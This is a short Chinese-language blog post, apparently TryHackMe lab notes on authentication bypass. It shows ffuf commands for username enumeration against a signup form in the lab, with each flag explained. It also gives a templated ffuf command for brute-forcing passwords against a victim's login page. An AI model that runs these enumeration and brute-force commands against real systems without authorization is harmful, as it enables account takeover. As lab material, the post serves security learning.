身份认证绕过-thm

1、用户名枚举

尝试注册用户的时候使用敏感的账户,比如admin查看是否会有错误提示,比如已注册,可以说明存在admin用户。

使用ffuf以及一个字典来进行爆破,字典没有的话,thm的attcak box 文件里面有,开http server下载到kali运行就行

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d “username=FUZZ&email=x&password=x&cpassword=x” -H “Content-Type: application/x-www-form-urlencoded” -u http://10.10.224.100/customers/signup -mr “username already exists”

下图为命令运行时爆破用户名,可以看出已经爆出了admin

-w参数选择计算机上包含我们要检查的用户名列表是否存在的文件的位置。参数-X指定请求方法,默认情况下这是一个 GET 请求,但在我们的示例中它是一个 POST 请求。该-d参数指定我们要发送的数据。在我们的示例中,我们有用户名、电子邮件、密码和 cpassword 字段。我们已将用户名的值设置为FUZZ。在 ffuf 工具中,FUZZ 关键字表示单词列表中的内容将插入到请求中的位置。该-H参数用于向请求添加附加标头。在本例中,我们将 设为Content-Type网络服务器知道我们正在发送表单数据。这-u参数指定我们发出请求的 URL,最后,参数-mr是我们要查找的页面上的文本,以验证我们是否找到了有效的用户名。

然后使用ffuf爆破密码,爆破结果取决于字典是否丰富

ffuf -w 保存着密码的文件.txt:W2 -X POST -d “username=需要被爆破的用户名&password=W2” -H “Content-Type: application/x-www-form-urlencoded” -u http://受害者存在登陆的地址 -fc 200

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注